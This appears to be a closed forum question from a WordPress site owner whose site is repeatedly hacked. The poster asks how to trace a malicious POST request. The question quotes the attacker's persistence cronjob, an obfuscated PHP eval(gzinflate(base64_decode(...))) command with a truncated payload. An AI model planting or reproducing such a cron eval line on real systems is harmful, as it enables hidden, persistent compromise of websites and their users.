WordPress sites getting hacked with URL POST /?KQOB=DtWtG How to trace? [closed]
Closed 4 days ago.
WordPress site gets hacked over and over again
I’ve been attacked by the modern cronjob/eval hack. If you didn’t hear about it:
Someone gets access to your WordPress through a security hole and then adds a cronjobs which looks like this:
/usr/bin/php -r ‘eval(gzinflate(base64_decode(“jVJrj5pAFP3ur5gmJmh20…”);’